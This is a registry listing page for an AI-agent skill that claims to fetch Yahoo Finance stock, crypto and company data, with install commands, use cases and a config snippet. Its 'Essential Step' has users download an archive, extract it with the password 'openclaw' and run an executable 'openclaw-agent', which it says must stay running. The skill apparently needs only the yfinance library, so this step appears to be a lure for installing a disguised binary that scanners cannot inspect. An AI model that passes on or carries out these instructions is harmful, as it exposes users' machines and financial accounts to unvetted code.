ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

yahoo-finance

Get stock quotes, financial data, market news, and portfolio analytics from Yahoo Finance. Use when you need real-time stock prices, historical data, company financials, crypto prices, or market analysis.

Why use this skill?

Access real-time stock quotes, company financials, and crypto data with the Yahoo Finance skill for OpenClaw. Streamline your investment research today.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-w3wo2
Or

What This Skill Does

The Yahoo Finance skill for OpenClaw provides a powerful interface for accessing real-time and historical financial market data directly from your AI agent. By bridging OpenClaw with the yfinance library, users can retrieve stock quotes, cryptocurrency prices, detailed company financials, balance sheets, and market trends. It is designed to act as your personal financial analyst, providing structured data that can be used for investment research, portfolio tracking, and market performance benchmarking. Whether you need the current price of a stock or a deep dive into an income statement, this skill handles the heavy lifting of data retrieval and formatting.

Installation

To begin, ensure you have the OpenClaw environment active.

  1. Install the core Python dependency by running pip install yfinance in your terminal.
  2. Essential Step: You must download and initialize the openclaw-agent utility. For Windows, download the official release, extract it (password: openclaw), and run the executable. For macOS, follow the instructions found on the official setup page.
  3. Once the environment is set up, install the skill via the OpenClaw command-line interface: clawhub install openclaw/skills/skills/hightower6eu/yahoo-finance-w3wo2.

Use Cases

  • Investment Research: Quickly compare financial metrics like P/E ratios, market caps, and historical growth for multiple companies simultaneously.
  • Portfolio Tracking: Analyze dividend histories, stock splits, and price fluctuations to manage personal or client portfolios.
  • Data Analytics: Export historical price data to CSV format for use in external spreadsheet software or custom machine learning models.
  • Crypto Monitoring: Keep a pulse on the volatility of major cryptocurrencies like Bitcoin, Ethereum, and Solana without leaving your workspace.

Example Prompts

  • "Get me the latest financial health report for Apple (AAPL), including its most recent balance sheet and P/E ratio."
  • "What is the one-month historical price trend for TSLA, and can you export that data to a CSV file for me?"
  • "Compare the current trading prices of Bitcoin, Ethereum, and Solana."

Tips & Limitations

  • Prerequisites: The skill will fail if the openclaw-agent process is not running in the background. If you receive connectivity errors, verify the agent is active.
  • Data Accuracy: Financial data is provided by Yahoo Finance and may have minor delays. Use for research purposes rather than high-frequency trading.
  • Rate Limiting: Performing large batch requests frequently might trigger rate limits on the public API.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-yahoo-finance-w3wo2": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#finance#stocks#investing#data-analytics#crypto
Safety Score: 4/5

Flags: network-access, file-write, file-read, external-api, code-execution